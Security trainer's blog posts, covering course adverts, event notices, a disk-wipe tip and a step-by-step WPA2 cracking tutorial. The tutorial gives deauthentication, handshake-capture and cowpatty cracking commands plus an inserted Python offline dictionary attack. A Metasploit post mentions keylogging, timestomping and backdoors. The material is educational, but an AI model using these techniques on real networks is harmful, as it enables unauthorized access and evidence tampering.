12.14
Many of you have asked for the presentation Digital Forensics vs Digital Anarchy that I have been showing at various colleges.
Here are the important screens from those slides:
Network Security – Incident Response – Digital Forensics
Hey Everyone,
I will be doing a show with the ISSA folks here in Michigan; check out the info here:
http://northoakland.issa.org/node/18
Hey Michiganders!
Why travel when you can get the training you need at a savings you can use, right in your local community?
Now you can save thousands on your training budget and still experience live SANS training right here in Detroit with a training class from the SANS Mentor Program. This is the most affordable live, in person training we have to offer.
With learning spread out over the course of several weeks, you can understand and digest this popular SANS course at a pace designed for busy working professionals such as yourself. This class will be led by Black Belt Mentor Mark Bennett. Mark brings over a decade of practical experience to the classroom, and will work hands-on with each and every student in this smaller classroom environment.
And as our way of saying thank you for training locally, you will receive a $200 gift card from Amazon.
**Enter Promo Code: MAG1211 when registering to receive your $200 Amazon Gift Card.**
Security 504: Hacker Techniques, Exploits & Incident Handling
(http://www.sans.org/info/84174)
Start Date – January 10, 2012 and runs weekly until March 13th.
Class Time: 6:30PM – 8:30PM
A Sampling of Topics Covered:
- The step-by-step approach used by many computer attackers
- The latest computer attack vectors and how you can stop them
- Proactive and reactive defenses for each stage of a computer attack
- Hands-on workshop addressing scanning for, exploiting, and defending systems
- Strategies and tools for detecting each type of attack
- Attacks and defenses for Windows, Unix, switches, routers and other systems
- Application-level vulnerabilities, attacks, and defenses
- Developing an incident handling process and preparing a team for battle
- Legal issues in incident handling
- Recovering from computer attacks and restoring systems for business
For complete event details visit http://www.sans.org/info/84174
**Enter Promo Code: MAG1211 when registering to receive your $200 Amazon Gift Card.**
**Offer ends December 31, 2011**
It is interesting how many people believe that their wireless is secure because they are using WPA. Well, we did a test recently and were able to basically password-guess our way in with a dictionary attack, using either a straight dictionary or a rainbow table. The cool thing is I bought an ALFA USB antenna and could sit down at the corner coffee place and still see my wireless access point.
Security people: be sure that your WPA passphrase is an unreadable random string, not something found in a dictionary, and not a readable phrase with character substitutions like op3nth3p0dbayd00rs; today's cracking wordlists, and the tables built from them, already include that kind of mangling.
In a nutshell, using Linux, this is how it is done:
Part I
airmon-ng start wlan0 (this puts the wireless card into monitor mode; on some drivers airmon-ng creates a separate monitor interface such as mon0, in which case use that name instead of wlan0 in the commands that follow)
kismet -c wlan0
Ctrl-C to exit kismet
airmon-ng stop wlan0
Part II
airmon-ng start wlan0
airodump-ng -c <channel number> --bssid <bssid> -w <output file prefix> wlan0
Example:
airodump-ng -c 9 --bssid 00:1B:11:EC:3D:D7 -w D-Link wlan0 * Note: airodump-ng appends a sequence number to the prefix, so all captured traffic goes to D-Link-01.cap
Now open another window, as we need to force a reconnect from the target (see the Note below):
aireplay-ng -0 <number of deauth packets> -a <bssid> -c <station MAC> wlan0
Example:
aireplay-ng -0 30 -a 00:1B:11:EC:3D:D7 -c 00:20:00:38:51:06 wlan0
When the station reconnects you will see "WPA handshake: <bssid>" at the top of the airodump-ng window. Capture a little more traffic and exit; all of the traffic, including the handshake, is in the D-Link-01.cap file.
Part III
Download either precomputed hash tables or a plain dictionary from Offensive Security: offensive-security.com/wpa-tables
Caveat: the WPA PMK is PBKDF2 of the passphrase salted with the SSID, so a precomputed table only works against the exact ESSIDs it was generated for (common defaults such as linksys or dlink). For any other ESSID, build your own table with cowpatty's genpmk or fall back to a plain dictionary.
If using precomputed hashes (the "rainbow" tables):
cowpatty -r <capture file> -d <hashfile> -s <essid>
Example:
cowpatty -r D-Link-01.cap -d dlink.wpa -s dynamite
If using a plain dictionary (straight word list):
cowpatty -r <capture file> -f <dictionary file> -s <essid>
Example:
cowpatty -r D-Link-01.cap -f passwords.wpa -s dynamite
Note: If you are in an environment that has a lot of cell phones like the iPhone (and they are using their wireless to connect to the network), we found these all go to sleep when their screen is turned off; then their wireless card wakes up when the screen is activated. So you don't need to send a de-auth; all you have to do is hang around long enough for someone to touch their iPhone or whatever cell and have it wake up its wireless and re-auth to the network. In other words, there is the weakest link! — LOL!
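The cracking step in Part III, as an added example that is not from the original post or from cowpatty's code: the Python below re-implements what cowpatty does with the handshake it pulls out of the capture file. It derives PMK = PBKDF2-HMAC-SHA1(passphrase, SSID), expands it to the PTK with the two MACs and two nonces, recomputes the MIC over EAPOL message 2, and compares it with the captured MIC; a match means the candidate passphrase is right. The "capture" is constructed in code from a made-up passphrase and nonces rather than read from D-Link-01.cap (the BSSID and station MAC are the ones from the examples above), and the EAPOL frame is built by hand with the MIC field zeroed. It shows the -f (dictionary) and -d (precomputed table) modes side by side, and why a table built for the wrong SSID finds nothing.

```python
"""Offline WPA2-PSK dictionary attack against a 4-way handshake (added example).

    PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes)
    PTK = PRF-512(PMK, "Pairwise key expansion", min/max(MACs) || min/max(nonces))
    MIC = HMAC-SHA1(KCK = PTK[0:16], EAPOL message 2 with its MIC field zeroed)[:16]

All handshake data below is constructed in code, not read from a real .cap file.
"""
import hashlib
import hmac
import struct
from typing import Dict, Iterable, Optional


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """802.11i Pairwise Master Key. The SSID salt is why precomputed tables are per-SSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: concatenate HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3."""
    blocks = (hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest() for i in range(4))
    return b"".join(blocks)[:64]


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """Pairwise Transient Key; its first 16 bytes are the KCK that keys the EAPOL MIC."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """WPA2/CCMP (key descriptor version 2) MIC: HMAC-SHA1 truncated to 16 bytes.
    WPA/TKIP (version 1) would use HMAC-MD5 instead."""
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


# EAPOL hdr(4) + descriptor type(1) + key info(2) + key length(2) + replay counter(8)
# + nonce(32) + IV(16) + RSC(8) + ID(8) = offset of the 16-byte MIC field
MIC_OFFSET = 81


def build_eapol_msg2(snonce: bytes) -> bytes:
    """Constructed WPA2 EAPOL-Key message 2 (station -> AP) with the MIC field zeroed,
    standing in for the frame airodump-ng would have written to the capture."""
    key_info = 0x010A  # pairwise | MIC present | descriptor version 2 (HMAC-SHA1)
    body = struct.pack(">BHH", 0x02, key_info, 16)        # RSN descriptor, key info, key length
    body += struct.pack(">Q", 1)                            # replay counter
    body += snonce + bytes(16) + bytes(8) + bytes(8)        # SNonce, IV, RSC, ID
    body += bytes(16) + struct.pack(">H", 0)                # zeroed MIC, key data length
    return struct.pack(">BBH", 0x01, 0x03, len(body)) + body  # EAPOL v1, type Key


def constructed_capture(passphrase: str, ssid: str) -> Dict[str, bytes]:
    """What the attacker extracts from the capture. MACs are the post's example BSSID and
    station; nonces and the passphrase are made up here (constructed sample data)."""
    ap_mac = bytes.fromhex("001B11EC3DD7")
    sta_mac = bytes.fromhex("002000385106")
    anonce = hashlib.sha256(b"constructed ANonce").digest()
    snonce = hashlib.sha256(b"constructed SNonce").digest()
    eapol = build_eapol_msg2(snonce)
    kck = derive_ptk(derive_pmk(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    return {"ssid": ssid.encode(), "ap_mac": ap_mac, "sta_mac": sta_mac,
            "anonce": anonce, "snonce": snonce, "eapol": eapol, "mic": eapol_mic(kck, eapol)}


def pmk_matches(hs: Dict[str, bytes], pmk: bytes) -> bool:
    kck = derive_ptk(pmk, hs["ap_mac"], hs["sta_mac"], hs["anonce"], hs["snonce"])[:16]
    return hmac.compare_digest(eapol_mic(kck, hs["eapol"]), hs["mic"])


def dictionary_attack(hs: Dict[str, bytes], wordlist: Iterable[str]) -> Optional[str]:
    """cowpatty -f mode: run the expensive PBKDF2 for every candidate on the fly."""
    for word in wordlist:
        if pmk_matches(hs, derive_pmk(word, hs["ssid"].decode())):
            return word
    return None


def precompute_table(ssid: str, wordlist: Iterable[str]) -> Dict[str, bytes]:
    """genpmk mode: PBKDF2 done once per (SSID, word) and stored."""
    return {word: derive_pmk(word, ssid) for word in wordlist}


def table_attack(hs: Dict[str, bytes], table: Dict[str, bytes]) -> Optional[str]:
    """cowpatty -d mode: only the cheap PRF + HMAC per candidate."""
    for word, pmk in table.items():
        if pmk_matches(hs, pmk):
            return word
    return None


if __name__ == "__main__":
    hs = constructed_capture("op3nth3p0dbayd00rs", "dynamite")
    words = ["password", "dynamite", "op3nth3p0dbayd00rs", "letmein"]
    print("dictionary:", dictionary_attack(hs, words))
    print("table built for dynamite:", table_attack(hs, precompute_table("dynamite", words)))
    print("table built for D-Link:", table_attack(hs, precompute_table("D-Link", words)))
```

Per candidate, the PBKDF2 step (4096 HMAC-SHA1 rounds) dominates; the PRF and MIC are a handful of HMACs. That is the whole economics of the -d tables: pay the PBKDF2 cost once per SSID and word, then test captures against that SSID almost for free, which is also why a mangled-but-predictable passphrase offers no protection once it is in the word list.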
Happy Cracking
As Always, Be Good, Be Safe, and if you are going to hack, hack LEGALLY and RESPONSIBLY—I’m Out!
I wanted to let everyone know I will be speaking at the local Michigan chapter of HTCIA. As always, my events are live, so you will get to see a live demonstration of how to create a forensic image of the shadow volume in Vista for use in analysis in the SANS SIFT Workstation.
February 9th, 2011, from 10:00 AM to 12:00 noon at the Troy Police Department, 500 W Big Beaver Rd, Troy, MI 48084. Check out the MIHTCIA website here: http://www.mihtcia.org/
As always, everything I do is live; I never give death by PowerPoint. If I can't demonstrate it live, I don't do it.
“Be good, be safe, if you are going to hack …hack legally and responsibly…I’m Out”
Hey everyone, I just subscribed to an awesome magazine, Digital Forensics. Check it out here: http://digitalforensicsmagazine.com/
Hello Again
People have been asking me to show some basic Metasploit and how you use it. I recently did a security show for the Michigan ISSA folks where we showed everyone how to use it, so I figured I would rehash that as well as build on it to give you a good feel for what you can do. So I created a video (see the video on the right side of the blog), and in it I show you how to own a box, as well as different commands you can use and how they work. We will use the Aurora exploit, with (and without) the Meterpreter, keylogging, victim enumeration, timestomp (to mess with a forensic timeline), backdoors, and more!
*Be good, be safe, if you are going to hack, hack legally and responsibly…I’m Out!
~Mark Bennett
Hello again! It has been a while since I blogged, but the Vector 2 show and its preparation were quite a bit to do. Those of you who saw us at Vector 2 remember that formatting a disk does not remove the data (see the video on the Vector 2 data recovery). During the video Jack and I talk about wiping things to the NIST standard. A great way to do this is through Linux (Unix) with a simple dd command.
Today I am going to talk about another way to wipe data, with a Microsoft tool: the sdelete (Secure Delete) command. It is part of the Sysinternals suite and can be downloaded directly from Microsoft. SDelete implements the Department of Defense clearing and sanitizing standard DOD 5220.22-M, to give you confidence that once deleted with SDelete, your file data is gone forever.
You can use sdelete to delete a single file like the normal delete command; however, that does not remove the file's entry in the file system (SDelete renames the file repeatedly to obscure the original name, but the record itself remains). In this write-up, though, I am talking about zeroing a drive.
Now it is important to remember that we are dealing with the unallocated space of the drive's data layer; the metadata (file names, MFT records) would still be there depending on time. So if you format the drive (wiping the metadata) and then run sdelete with the "-c" flag against it (plugged in over a USB cable) to zero the free space, you will have effectively wiped the drive. After taking a sample image of the disk and running strings over it, you will find that the disk is full of nulls (zeros). Two caveats: check the flag against the usage output of your SDelete version, since later releases use -z to zero free space and -c for the multi-pass DoD clean; and this applies to spinning disks, because on an SSD wear levelling can leave copies of overwritten data in flash the OS cannot address, so use the drive's own ATA Secure Erase there.
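The verification step above (take a sample image, run strings over it, expect nothing but nulls) as an added example that is not part of the original post and not a Sysinternals tool: the Python below scans an image or raw device in fixed-size chunks, counts non-zero bytes and reports where the first one sits, and runs a minimal strings over whatever is left. The "before" and "after" images are constructed in memory here (a formatted-but-not-wiped disk with file remnants in unallocated space, and the same disk after zeroing); on a real drive you would point scan_path at a dd image, /dev/sdX, or the physical drive path with administrator rights.

```python
"""Check that a wiped disk image is really all zeros (added example, constructed data)."""
import io
from typing import BinaryIO, List, Optional, Tuple

CHUNK_SIZE = 1 << 20  # 1 MiB reads keep memory flat on multi-GB images


def zero_fill_report(image: BinaryIO, chunk_size: int = CHUNK_SIZE) -> Tuple[int, int, Optional[int]]:
    """Return (bytes_scanned, nonzero_bytes, offset_of_first_nonzero_byte_or_None)."""
    scanned = nonzero = 0
    first: Optional[int] = None
    while True:
        buf = image.read(chunk_size)
        if not buf:
            break
        zeros = buf.count(0)
        if zeros != len(buf):
            nonzero += len(buf) - zeros
            if first is None:
                first = scanned + next(i for i, b in enumerate(buf) if b)
        scanned += len(buf)
    return scanned, nonzero, first


def is_wiped(image: BinaryIO) -> bool:
    """True only if not a single non-zero byte remains anywhere in the image."""
    return zero_fill_report(image)[1] == 0


def printable_strings(data: bytes, min_len: int = 4) -> List[str]:
    """Minimal `strings`: runs of printable ASCII at least min_len long."""
    found, run = [], bytearray()
    for b in data:
        if 0x20 <= b < 0x7F:
            run.append(b)
            continue
        if len(run) >= min_len:
            found.append(run.decode("ascii"))
        run = bytearray()
    if len(run) >= min_len:
        found.append(run.decode("ascii"))
    return found


def scan_path(path: str) -> Tuple[int, int, Optional[int]]:
    """Scan an image file or raw device.
    Linux: /dev/sdX as root.  Windows: r"\\.\PhysicalDrive1" from an administrator prompt."""
    with open(path, "rb") as fh:
        return zero_fill_report(fh)


# Constructed sample data: 3 sectors of 4096 bytes. The unwiped image still carries
# remnants of a deleted spreadsheet in unallocated space after a quick format.
def constructed_unwiped_image() -> bytes:
    remnant = b"Q4_payroll_draft.xlsx\x00\x00Account: 4111-1111-1111-1111\r\n"
    return bytes(4096) + remnant + bytes(4096 - len(remnant)) + bytes(4096)


def constructed_wiped_image() -> bytes:
    return bytes(3 * 4096)


if __name__ == "__main__":
    for label, img in (("before wipe", constructed_unwiped_image()), ("after wipe", constructed_wiped_image())):
        scanned, nonzero, first = zero_fill_report(io.BytesIO(img))
        print(f"{label}: {scanned} bytes scanned, {nonzero} non-zero, first at {first}, "
              f"strings={printable_strings(img)}")
```

A single non-zero byte fails the check on purpose: a wipe that leaves "almost nothing" has left the interesting part, and the offset of the first non-zero byte tells you which region (partition table, MFT mirror, slack) the tool did not touch. Sample the drive itself, not the volume, since sdelete -c only reaches free space inside the file system it was pointed at.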
Well, that is the tip for now. Stay tuned, we have some exciting things coming up. Until then, be good, be safe, hack legally and responsibly...I'm out!